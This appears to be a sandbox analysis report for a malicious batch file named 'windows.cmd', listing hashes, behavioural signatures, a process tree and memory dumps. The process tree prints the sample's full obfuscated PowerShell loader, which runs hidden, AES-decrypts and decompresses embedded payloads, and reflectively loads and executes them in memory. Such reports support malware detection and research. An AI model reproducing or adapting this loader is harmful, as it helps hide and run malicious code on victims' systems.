f0e5b0472df1921c5b9c32c0dc4c1a3a2cc15084b72df00fe2710f63221ee224

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
16-03-2024 03:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

windows.cmd
Size

66KB
MD5

3a56f31eda19041d7ea9aeab089847eb
SHA1

1ca9985ab27390bdd710c5f6d09af344b69ed56b
SHA256

562cc7b2b867668ff252095a3bb3dc0641428fddd6ea23cfca475541fc10cbf9
SHA512

1c633d473ed3ac06acfb06f012e5c7e0dc8402b8bba9680a4b97fe5282a5f8614331b2bed6132fa4d583f67022aa5ef0a7b96774cda94861c396be2250d149ca
SSDEEP

1536:gElMViXyqGaO24iKbBG6IV3VvhRvRt/rCwIK4GfFjR:gn71aO24FdG6INVvhRptTCSNFjR

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2376 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2376 powershell.exe

pid	process
2376	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2376	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2232 wrote to memory of 2328	2232	cmd.exe	cmd.exe
PID 2232 wrote to memory of 2328	2232	cmd.exe	cmd.exe
PID 2232 wrote to memory of 2328	2232	cmd.exe	cmd.exe
PID 2328 wrote to memory of 1756	2328	cmd.exe	cmd.exe
PID 2328 wrote to memory of 1756	2328	cmd.exe	cmd.exe
PID 2328 wrote to memory of 1756	2328	cmd.exe	cmd.exe
PID 2328 wrote to memory of 2376	2328	cmd.exe	powershell.exe
PID 2328 wrote to memory of 2376	2328	cmd.exe	powershell.exe
PID 2328 wrote to memory of 2376	2328	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\windows.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows.cmd
2⤵
- Suspicious use of WriteProcessMemory
PID:2328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows.cmd';$WLJw='InCvYLvCvYLokCvYLeCvYL'.Replace('CvYL', ''),'TGQJMraGQJMnsfGQJMormGQJMFinGQJMaGQJMlGQJMBGQJMloGQJMckGQJM'.Replace('GQJM', ''),'SplSyGditSyGd'.Replace('SyGd', ''),'ElwKIbemwKIbewKIbntAwKIbtwKIb'.Replace('wKIb', ''),'LoaLqPaaLqPdaLqP'.Replace('aLqP', ''),'GeZtXeeZtXteZtXCueZtXrreeZtXneZtXtPreZtXoeZtXceseZtXseZtX'.Replace('eZtX', ''),'EntPkLTryPPkLToinPkLTtPkLT'.Replace('PkLT', ''),'CKpdDopyKpdDToKpdD'.Replace('KpdD', ''),'ReeqVLadLeqVLieqVLneeqVLseqVL'.Replace('eqVL', ''),'DdbPkecdbPkompdbPkrdbPkessdbPk'.Replace('dbPk', ''),'CLyDOreaLyDOteLyDODeLyDOcryLyDOpLyDOtLyDOorLyDO'.Replace('LyDO', ''),'FIaBCroIaBCmBaIaBCsIaBCe64IaBCStIaBCrIaBCinIaBCgIaBC'.Replace('IaBC', ''),'MIJoCaIJoCinIJoCMIJoCoduIJoCleIJoC'.Replace('IJoC', ''),'ChaQjVanaQjVgaQjVeaQjVExtaQjVensaQjVioaQjVnaQjV'.Replace('aQjV', '');powershell -w hidden;function ImYLZ($JnwiD){$XxYKa=[System.Security.Cryptography.Aes]::Create();$XxYKa.Mode=[System.Security.Cryptography.CipherMode]::CBC;$XxYKa.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$XxYKa.Key=[System.Convert]::($WLJw[11])('T0dKGXhcNl1TXEBdsATQZk5fcZVOR6MRYQ0653LUp+o=');$XxYKa.IV=[System.Convert]::($WLJw[11])('Z5oBwCXIC4JH125OsE/9wg==');$iuKeX=$XxYKa.($WLJw[10])();$zSovn=$iuKeX.($WLJw[1])($JnwiD,0,$JnwiD.Length);$iuKeX.Dispose();$XxYKa.Dispose();$zSovn;}function pYWXC($JnwiD){$EfKAz=New-Object System.IO.MemoryStream(,$JnwiD);$wKBJr=New-Object System.IO.MemoryStream;$NjZtV=New-Object System.IO.Compression.GZipStream($EfKAz,[IO.Compression.CompressionMode]::($WLJw[9]));$NjZtV.($WLJw[7])($wKBJr);$NjZtV.Dispose();$EfKAz.Dispose();$wKBJr.Dispose();$wKBJr.ToArray();}$lxWGc=[System.IO.File]::($WLJw[8])([Console]::Title);$hbekG=pYWXC (ImYLZ ([Convert]::($WLJw[11])([System.Linq.Enumerable]::($WLJw[3])($lxWGc, 5).Substring(2))));$FPrZl=pYWXC (ImYLZ ([Convert]::($WLJw[11])([System.Linq.Enumerable]::($WLJw[3])($lxWGc, 6).Substring(2))));[System.Reflection.Assembly]::($WLJw[4])([byte[]]$FPrZl).($WLJw[6]).($WLJw[0])($null,$null);[System.Reflection.Assembly]::($WLJw[4])([byte[]]$hbekG).($WLJw[6]).($WLJw[0])($null,$null); "
3⤵
PID:1756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2376-4-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2376-5-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2376-6-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2376-7-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-8-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2376-10-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-9-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-11-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-12-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp

Filesize
9.6MB

Download
memory/2376-13-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-14-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-15-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2376-16-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads